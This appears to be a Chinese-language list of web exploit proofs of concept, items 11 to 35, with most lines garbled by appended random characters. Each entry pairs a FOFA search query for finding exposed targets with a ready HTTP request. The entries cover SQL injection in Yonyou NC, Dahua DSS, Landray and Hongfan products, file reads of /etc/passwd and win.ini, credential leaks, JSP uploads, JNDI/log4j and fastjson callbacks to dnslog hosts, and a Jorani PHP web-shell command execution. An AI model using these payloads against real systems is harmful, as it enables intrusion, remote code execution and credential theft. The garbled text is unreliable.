11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入: n& p& D4 v5 @ y- O( _1 N% y% z5 ]
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
: c) p0 Z% f$ V. U/ i/ [GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
; M) ?( v0 b: x; T( iHost: 127.0.0.1$ Z: P/ k- `0 }' U, F! B7 ^' ?
Pragma: no-cache, C/ X$ ~/ J; n
Cache-Control: no-cache
/ X A% G. V: h1 Z# f6 b6 JUpgrade-Insecure-Requests: 1
b: }- b' X6 s: u4 \7 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, y, j" @' Z& _' [8 Q( ~8 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- S+ D6 }1 i& ~7 m+ zAccept-Encoding: gzip, deflate6 D! i* m0 b& S( ~! d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8* j x4 @7 Z# b2 B8 L8 I
Connection: close/ U$ ^8 P" U8 X6 Y; P
0 [8 k7 b( l) Z
# k; l* T- K2 H0 ]. _12. Jorani < 1.0.2 远程命令执行2 Z/ `; y0 R0 S" i
FOFA:title="Jorani"5 ]0 U" d7 O* d
第一步先拿到cookie
4 d1 i3 b+ c$ i: t+ H, z! iGET /session/login HTTP/1.13 p% m; k8 u, |. P; w
Host: 192.168.190.30
5 N" r o; D+ R- i; x9 IUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% X; q) p: q; z# x& S1 y( t: NConnection: close0 E7 _+ y2 D7 ~' j8 T! u7 i
Accept-Encoding: gzip
5 t3 T5 s1 w* }5 u/ u
0 s" X6 l8 k! D
( `! D3 X5 T, ?) s5 T' @响应中csrf_cookie_jorani用于后续请求
2 I9 S& s* S0 R! f& @4 ^. {$ }HTTP/1.1 200 OK8 y( g* V$ @ t0 G H% a
Connection: close
* `& K, \2 R1 ECache-Control: no-store, no-cache, must-revalidate
5 W- j! Z/ o0 M) \4 Y0 G) [Content-Type: text/html; charset=UTF-8
( s1 w/ Q9 _8 ]4 ?. Z; L+ @- tDate: Tue, 24 Oct 2023 09:34:28 GMT
) n/ X" S1 X5 N$ e5 {1 FExpires: Thu, 19 Nov 1981 08:52:00 GMT; R1 a# l' w5 H; s
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT& Y, w) y3 }8 r6 ~2 b( \& x9 o
Pragma: no-cache
. j( I/ B; g N" iServer: Apache/2.4.54 (Debian)
# b& T1 y0 c% s! aSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=// h8 f/ I9 ^' }/ w! P* i" T& ~
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
( N! j; j0 E5 r9 C+ Q, KVary: Accept-Encoding1 Y' Z: J5 l1 e4 {& P2 Y: i
8 X' V1 i3 [) y: K( `- j/ |% r& b6 O
POST请求,执行函数并进行base64编码4 H. W* G4 W) G3 y' A# i
POST /session/login HTTP/1.1
0 b. n3 F7 I6 G8 U* sHost: 192.168.190.30
$ M- }# H0 x& \! pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 y: |8 J! Z( W) F7 F, ]Connection: close1 F8 `9 x4 ~; i# ~
Content-Length: 252
5 N1 e, [$ ?* Z- j0 E: u8 PContent-Type: application/x-www-form-urlencoded
" w9 M+ H, E6 }Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
0 ^4 D- I7 c, F8 O; jAccept-Encoding: gzip, ^" _& |2 ?" h' ?& p8 L
& K6 @% b- h5 W' G% {csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor- y: w. \: j ]9 h, Q
1 E9 Q0 }3 f Q) |" {
" i6 k. W$ i. a. ?# q% C2 M& _6 ?+ p; S% R* b- a6 C# q
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串! M1 i" B0 n! L
GET /pages/view/log-2023-10-24 HTTP/1.1
7 U* B. Z: X9 A% H% r9 p: j+ ZHost: 192.168.190.30
0 j" `$ |0 {" V$ J4 ]- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" m& z7 m: {9 }4 `Connection: close+ W& b4 k1 f; I1 B; R
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r* O- t, k% `, Q2 l1 H
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
: I$ F% ~$ V/ bX-REQUESTED-WITH: XMLHttpRequest
* X' ]; o% n9 H7 }. M3 kAccept-Encoding: gzip
9 h: x4 e H8 _# M: U3 E7 T, o9 ^* k) l9 k8 j0 D' l% i( ?+ C+ ~
' I8 O7 ] z( ]# G' z3 y13. 红帆iOffice ioFileDown任意文件读取! {8 I( U6 C7 F7 q0 `& l' ~4 v
FOFA:app="红帆-ioffice") d! O) x3 ~, u& W6 n
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1$ |: h1 `$ f: t- M
Host: x.x.x.x& [# B4 z' z6 x- z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, W/ i# e8 y8 d W9 jConnection: close
# N& R$ E! {; n. P) VAccept: */*
$ }$ j) `( _8 {: O9 fAccept-Encoding: gzip \ I; @! T- H) V
3 [# R0 B8 a# c0 C" o
( B1 m1 P6 H$ e' r& c* F14. 华夏ERP(jshERP)敏感信息泄露
. L1 r) b8 i2 \; o$ z" PFOFA:body="jshERP-boot"
0 u0 C3 Q8 n$ q9 l. e$ z泄露内容包括用户名密码; S( p% D, j& n4 A: `/ ~1 W3 F
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
" K( H" Q* R+ B/ E+ c3 QHost: x.x.x.x$ V# s- W1 Z& O2 _" P q0 S0 G6 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
8 X1 s8 b9 C( ^) H9 V c7 fConnection: close
& B" u7 z# @7 _/ h5 V) Q9 oAccept: */*
$ S7 h8 Z4 q! L7 s; [7 iAccept-Language: en1 E% Z# C( a" ]& ?' @6 H3 t
Accept-Encoding: gzip. j( J( D7 Y9 W# u! {$ o I9 o
% @$ Z. y1 |" u1 E2 L# w9 c
- J% Y% {4 m) P, u. @ \8 x15. 华夏ERP getAllList信息泄露
3 M# x" u$ W, a7 OCVE-2024-0490* S, D6 O F) U, R9 d
FOFA:body="jshERP-boot"$ z: k7 h2 r# u/ R- F
泄露内容包括用户名密码0 S2 R) ~2 l" H+ g' E2 Q9 {
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
5 E1 L8 h' W1 U! }+ _Host: 192.168.40.130:100, y) G% O3 o* G L5 Z# [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36' l: |" z* D2 O, S( c
Connection: close, W$ q2 w, m1 w3 T _
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 G% k% k" g6 l6 u
Accept-Language: en6 R$ V; b; V$ _/ s
sec-ch-ua-platform: Windows/ L1 D9 J, @. [# u6 X: ?' e, ^4 Z
Accept-Encoding: gzip% [6 E5 O# T8 O5 n/ j
7 h) G! K2 d. \3 Y9 I" d
' |" ]7 V- y7 M- w, G! a. w16. 红帆HFOffice医微云SQL注入
2 m/ h+ u+ L) k- n4 ^% z9 YFOFA:title="HFOffice" @. }9 p; Z. l) d- t' a
poc中调用函数计算1234的md5值5 {! c2 q" u" R' @" [, g' t. Q
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
! y% B8 _, g7 G$ _2 Q' lHost: x.x.x.x* V& B; }5 @3 I8 c U& x( ]. p
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
. g9 C& G! s c" |Connection: close
# I% A' y8 j% W. F7 L- A, E: l0 O, sAccept: */** B V0 v$ _9 d$ n- F8 P1 z* {
Accept-Language: en8 v+ V- [& E' S! E6 e) R
Accept-Encoding: gzip
' n' K" i1 O2 g# Q
: @+ K# A9 w6 J2 l: Y1 o) d5 U0 Z+ A( x4 Q& `/ l
17. 大华 DSS itcBulletin SQL 注入/ T# |7 r6 S: ?/ B8 W& C5 {
FOFA:app="dahua-DSS"1 Y! n+ @# w O( S
POST /portal/services/itcBulletin?wsdl HTTP/1.1
& d3 u- n4 x8 |Host: x.x.x.x
/ e! f& P0 P8 E: ^; R, j- D; K. {( ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 K& V" L; M! k1 V* ZConnection: close0 F" s4 `6 ?( I% _0 I p2 r
Content-Length: 3451 [) p" d% I' A2 y U
Accept-Encoding: gzip
8 X7 {- S" [+ D
% c" ]7 F, d& H& p. `<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
~. v: C+ H! s# q% r% X: G r Q<s11:Body>
, ~) n+ w$ ?1 A+ k' c <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
/ n2 j9 h' C; C- C# Y: K9 H <netMarkings>
6 B# X) x$ K7 C1 ~' c (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
$ Q( H# m2 M# t6 T </netMarkings>
8 G- O# Z* \" W1 u1 ^/ ~ </ns1:deleteBulletin>. E1 p& p0 R- B
</s11:Body>/ j: K& k5 X+ N. l5 S
</s11:Envelope># V# A- @, W8 j
# ]) V: A3 t' `" b- G, |
# T& D0 d; }1 ^. V* ~
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
7 {5 F& p# V, L4 m( yFOFA:app="dahua-DSS"8 E" Q. h5 X8 X
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1/ }6 ~/ f5 A. j. C! M# Y
Host: your-ip
" D. z, T- D) G; h( u; eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 S) Q: W! z$ Q0 v% U* eAccept-Encoding: gzip, deflate
( d. R7 _* H2 e. R8 bAccept: */*$ f: y- x$ E, E: d3 @% G& I
Connection: keep-alive% i. [9 R5 h% N' q" Z
8 E, p. L8 y; R7 ]1 o0 j3 A/ i- k5 _% m+ ~: s6 h
4 e. `! }) O; R x' f6 X/ ~7 P19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 y& n& [+ a2 h+ A4 N; vFOFA:app="dahua-DSS"
6 s% }! E4 c! z* ]& @( ?) FGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.13 F2 W% w# C$ H! U @3 C5 R
Host:! g9 b" f |3 |8 @
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36& ^: q' Y/ D" K( @
Accept-Encoding: gzip, deflate, `; k! {7 m' W
Accept: */*- Q( k: s( m" j- K
Connection: keep-alive* P: ]2 U3 ]- d- P; B
" O* q* S) o, L7 ~! Z
6 G0 Z; |( O* t7 S; w- `& W+ x. T20. 大华ICC智能物联综合管理平台任意文件读取
5 z1 H& e8 o/ Y: m' M$ mFOFA:body="*客户端会小于800*"
& \$ {' L5 h( Y3 cGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
; y2 H S: R# w# {Host: x.x.x.x; U( @, U2 y H% i
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* M& o' y2 i5 m8 @) u0 n, B
Connection: close
9 K" t! C0 F3 `Accept: */*/ _: S1 l6 W; N- S8 a
Accept-Language: en
0 J& ~1 y- V& w8 f; t' bAccept-Encoding: gzip; z/ S5 p$ |- T, R+ B9 u
* X8 F# m3 s- r- E: h0 _( [+ p
% {* j" o9 ]$ A T" n2 B
21. 大华ICC智能物联综合管理平台random远程代码执行. ^# W! |4 A; m# k2 Q/ }: T
FOFA:icon_hash="-1935899595"
0 v: q/ F; B0 I2 r9 [. \' U- {2 ?7 K) bPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
0 _9 K2 F* d" E& c$ |5 j" Z2 RHost: x.x.x.x6 W. u1 b/ A' A" p8 w$ W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 `' ] }, w/ \7 x* m2 Y# t
Content-Length: 161
- A5 I- i$ i: Z$ r; ?3 {6 e, s( U {Accept-Encoding: gzip
# f* }) T2 Z8 R) p- o- rConnection: close. g5 k8 h* L- S2 c' \6 g
Content-Type: application/json;charset=utf-8
/ V, [, f# l9 e! E
: J" n" j( R2 w{
( I- }' {$ ? i8 a. X"a":{( @3 Z7 }& G& U! f
"@type":"com.alibaba.fastjson.JSONObject",% W& P4 Y' l' p0 S& D, R
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}; o8 c+ q# V+ \1 f6 P- p4 j
}""
% j+ r7 v8 s3 C) ]; W. Y+ H}
8 L. I9 W; Z3 l2 a8 ~& [ W* b6 ^3 B7 |$ E0 B# c7 V
2 A, A. R: F W# d22. 大华ICC智能物联综合管理平台 log4j远程代码执行
7 }5 Z& x# q0 Q8 _6 [FOFA:icon_hash="-1935899595"; o+ h0 k x$ L8 E' h: B
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
! Z6 R" w l7 U8 q0 K3 d: _Host: your-ip
( p( c8 e) n2 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; d$ `' ~2 W( m5 r9 r) QContent-Type: application/json;charset=utf-8
7 x# L; s) o" {4 D2 x9 q! m4 s4 ~4 x/ A0 [3 ]
{
C, ]$ l6 I; W4 n% T6 E" {0 K"loginName":"${jndi:ldap://dnslog}"/ I }5 o* N" d; H
}
, W- _ T4 H; H+ N
# c- g, @0 f! k, q* O# h
; Z# }* J8 }4 e0 j. F3 h# _( y+ ? L8 p& W1 n! d
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行3 p8 s/ C* ^. p
FOFA:icon_hash="-1935899595"7 ^5 t: E* x( z
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
% I. k1 T8 t+ o# s+ n7 j- P. b: sHost: your-ip
2 ~: u5 O/ R& L+ Y0 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 ^+ y2 c0 ?5 T7 _& z6 XContent-Type: application/json;charset=utf-8
* {# f w( K- `4 k7 o7 e! N4 LAccept-Encoding: gzip% v) A1 e4 {8 L; e8 A, y; S
Connection: close
/ w# H# G3 R. r" f8 s' K1 D- q
; M" G7 {" a, T! w) Y/ e9 _7 |{( K% Y1 R! w+ O, r
"a":{
; f; C) t* |8 B4 g+ x "@type":"com.alibaba.fastjson.JSONObject",
) w' s% F9 [& V" m, s, \ {"@type":"java.net.URL","val":"http://DNSLOG"}
4 y' J0 j. ?* u2 Y; {# n0 B }""
' D# r0 f# t- Y' \+ n}& |. m- U4 } i9 T
8 Z! [, z% f, v( e9 s* K
0 w( C( U$ j& g5 ?# @% A4 s- ]# E
24. 用友NC 6.5 accept.jsp任意文件上传
) Q0 }" D5 x% S- fFOFA:icon_hash="1085941792"5 o# z* p4 Q2 V9 Y. S6 P
POST /aim/equipmap/accept.jsp HTTP/1.13 ]5 u7 I$ F( _8 N3 l5 y
Host: x.x.x.x
0 a2 R# F; [9 v2 B# m3 h" L HUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.360 \3 y$ q0 F; }) L2 d- V% E) b7 C
Connection: close! @& v& K& _7 S
Content-Length: 449$ c3 Q1 q2 U- P8 _3 S6 p
Accept: */*
6 o! b) P$ H e1 x, pAccept-Encoding: gzip( W( a7 `8 ?% t% e2 O
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc) Y# v. a- `* j! J6 \+ C
2 f( F s8 E# E% j+ e3 F# Y-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
- C6 j$ f5 Q0 ~Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
% g/ C4 ?4 b# P5 e4 JContent-Type: text/plain6 ^! O8 h# S# i4 r; g4 N
6 B0 y6 e7 w8 ]* y
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
1 T2 q/ P( M6 P/ ^1 Y# S; f( @-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ k$ K5 x4 t8 O% }* c Q- ]Content-Disposition: form-data; name="fname"
5 Q8 Q* n+ @# @/ d {5 d7 X* R* ] _3 G, M% w
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
0 z/ \ B- F' ^* j3 K# J0 O( x9 R-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--/ ^% }/ F& H$ q8 @6 O8 Y E
$ ^6 y- @! c' J) J) W
+ g4 P( x. A5 [. U! |25. 用友NC registerServlet JNDI 远程代码执行( a% I1 k% e& m. }! Y
FOFA:app="用友-UFIDA-NC"' e) [" A, t. B3 s( ]. s3 b* n
POST /portal/registerServlet HTTP/1.1
1 s) }( C5 ^2 K% \& ZHost: your-ip+ H( R/ ?$ @* Q6 A) z0 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
% r) L+ ~# `/ J; sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
& N( d3 r. P! p1 o0 SAccept-Encoding: gzip, deflate# w- y$ H. G0 F- S7 j+ P
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.62 l+ x1 o% Q! w5 e
Content-Type: application/x-www-form-urlencoded! |; ?, a/ m- T0 P. B9 I' |* h# Y, i3 p; x
6 ? Y2 W/ e0 C: c$ J3 rtype=1&dsname=ldap://dnslog$ R- V+ s' f5 n7 c
y- M0 {5 o# j! u2 |
2 j, q8 o# N Q$ P$ [ d" P
' C9 v% A; E0 g7 h/ A) S6 Q% C
26. 用友NC linkVoucher SQL注入/ J1 P6 z/ C5 s* H
FOFA:app="用友-UFIDA-NC" h* d+ _8 t7 a( ]& j9 M$ a
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) n8 V( m7 T; E5 b& V2 T! ?Host: your-ip4 e0 s) N0 i+ s' R1 W' B8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 M' L5 C' ?) R; p( d. EContent-Type: application/x-www-form-urlencoded
) t( u) z$ [$ L2 S! @Accept-Encoding: gzip, deflate0 V: r* p7 N5 Y6 }( t
Accept: */*0 T8 E. V w m C% \/ M* Y
Connection: keep-alive
2 B% F, \9 t# V }+ [+ y% a5 C$ h2 ?
r1 @1 l' J; i# N. Q27. 用友 NC showcontent SQL注入
' ?$ w8 U% E. k. T8 AFOFA:icon_hash="1085941792"0 \) L, s% o* s
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1" d6 M" I u/ }' l
Host: your-ip
6 @3 N9 `1 G0 w: ]5 A/ d) _7 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
j6 S7 @0 K( gAccept-Encoding: identity/ P& t7 _4 G9 P( i
Connection: close
% S0 [2 B5 e) d0 f/ bContent-Type: text/xml; charset=utf-8
0 P9 n4 q$ a/ a& W4 D/ t) f0 f' `! L8 D6 S1 y. m: f
4 t6 g5 g% \' @2 a% U
28. 用友NC grouptemplet 任意文件上传, m1 l. k/ ]2 a5 ~
FOFA:icon_hash="1085941792"$ G/ W. W8 L& Y; L: b
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
/ A, ` T' |) j! i D, N }1 L4 SHost: x.x.x.x
5 C) ?2 A' J' S' s6 }' O2 H9 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.366 b+ ^+ X9 @9 {' N8 ]
Connection: close
3 f. b8 q0 n: f A8 b. h# A7 e- TContent-Length: 268
3 m0 _0 j4 X: \. y8 iContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk5 Z8 R- W8 z8 h. Q8 S1 o5 r4 g5 \ M! a) Q
Accept-Encoding: gzip
4 m) a6 o, R: f6 Y& U2 S
A1 y: ~3 H6 [------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk$ C$ x( s" t, i0 s5 u& x
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"6 A$ d2 {5 u: v+ q1 o' \0 c i
Content-Type: application/octet-stream
8 n2 v4 q) G: X6 }8 `' }, O& E6 q; J2 v. b$ s* C8 k7 P
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>$ s0 K, |9 x8 x
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--& @# I, ^6 r% R: A
# T$ a2 p' O, m$ ?8 [% ~9 d# J
8 w5 B2 l& D3 k; ~5 h: V/uapim/static/pages/nc/head.jsp
7 p8 s8 {8 j4 _/ i5 Q' j. z; s$ ?+ }' N/ z5 j+ L
29. 用友NC down/bill SQL注入
- @# z# g2 c: w' h" v OFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
. q* B- B7 F' F$ oGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1; @5 L% B' P: I
Host: your-ip
& z% Z$ p1 x @* K* m* mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Z! r: M1 d2 ]Content-Type: application/x-www-form-urlencoded+ C1 x5 g# K h& k
Accept-Encoding: gzip, deflate
( M- P" C! j6 V7 a. iAccept: */** {- c* _# E& P
Connection: keep-alive6 z: m9 U* Q, g: p- ]
; Q' E3 E" N4 T
* b, Z- V- ~; W3 M$ U30. 用友NC importPml SQL注入6 n$ V* b9 @ X7 M" }
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"' ~3 w+ x! q! y r' _
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 d& {) U% ^# D$ T* U
Host: your-ip+ L. Z1 W0 O* f/ c5 y* X& ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
; A# X6 y# s/ a: cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 C* x n( N$ w7 ~
Connection: close8 j; E1 J8 _" U1 ]* N* k( N
0 }4 o. j) U8 c" g9 K+ M( R/ F------WebKitFormBoundaryH970hbttBhoCyj9V5 W; s! o9 c4 j9 r6 D5 L: E" m
Content-Disposition: form-data; name="Filedata"; filename="1.jpg", A }7 N& K) w5 C v0 G- _) G
Content-Type: image/jpeg* z' l7 D3 r9 ?+ N4 L4 T
------WebKitFormBoundaryH970hbttBhoCyj9V--
: g, ~1 s0 g: t8 a' r+ i3 c) h% D* }$ I
# J" w* V* i# o( c
31. 用友NC runStateServlet SQL注入
' s- W7 z: [3 I+ Wversion<=6.5
: B) F) o" d# } M1 k+ p0 m! m1 EFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"- s7 T; [* ]/ w- u) R3 s% ^
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ m' P5 l5 C% l) e9 M. _& @$ ]: o
Host: host
: n, [- U- o2 Y5 j( n! ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' }. d0 O' e- G
Content-Type: application/x-www-form-urlencoded& s/ l+ J7 ?: {& T7 V" h% o) |
7 P' K+ f6 }) B! M
' i/ U+ R, N& W9 z+ x% V6 j# B- }2 B32. 用友NC complainbilldetail SQL注入' x r X( w7 e3 ?. N7 b
version= NC633、NC65
. O8 l' D+ i( ?. U/ R) EFOFA:app="用友-UFIDA-NC"- _8 ^ m/ M( H) ~+ h+ Q8 ?
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 I) l( @) E9 k1 M3 v: @( cHost: your-ip
$ _- Q* _6 j% I9 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. I/ m/ H! h1 t7 T( Z6 d; yContent-Type: application/x-www-form-urlencoded
$ j( Q2 w7 n/ Q% v' DAccept-Encoding: gzip, deflate
" J; _ W* s; dAccept: */* t3 m& I/ A7 _" W
Connection: keep-alive
9 d/ i) r( e8 ^0 l4 j0 b! @/ ]" E2 D: r4 Z4 N
3 r9 ~3 R: R9 N33. 用友NC downTax/download SQL注入
( x [; }+ s: Sversion:NC6.5FOFA:app="用友-UFIDA-NC"( g! g1 ]8 o# }" c4 H
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) S/ f. y' @; w( g! h) JHost: your-ip
8 l3 r* L) L4 @5 d' v# t- [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- }( \. D, \' ~, s/ c; F% sContent-Type: application/x-www-form-urlencoded5 @2 O3 r' l. t" g4 m1 r4 {* k. K9 O
Accept-Encoding: gzip, deflate m& W: g% g9 |# r: w9 B
Accept: */*
. h/ L# m+ e& s0 ~Connection: keep-alive
- M; T0 E0 H2 L& p* W. o* o7 \) _5 S9 B9 e X
0 r( ^, d$ s/ ?. N$ D# {34. 用友NC warningDetailInfo接口SQL注入* D) j4 M, P! I& m! h% {
FOFA:app="用友-UFIDA-NC"
4 l, i( T/ w; A8 G& T3 FGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1; w' B8 `# E$ b
Host: your-ip
) C* @) F! q9 ~3 ^9 g) G7 Q% o) d$ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 }" e8 d% L$ }- F1 D6 G/ t' R) V( HContent-Type: application/x-www-form-urlencoded6 [' ?- v" @) j* e" v( T
Accept-Encoding: gzip, deflate6 e# \5 D3 A. v; K
Accept: */*
C. @7 z( G4 M% V. y+ \3 {2 wConnection: keep-alive2 G& ^4 v5 C* X* a6 }! c8 Q: r" ~5 v2 L
& `& V5 R5 M6 E: _- p
9 F7 b0 J' `1 r% }35. 用友NC-Cloud importhttpscer任意文件上传
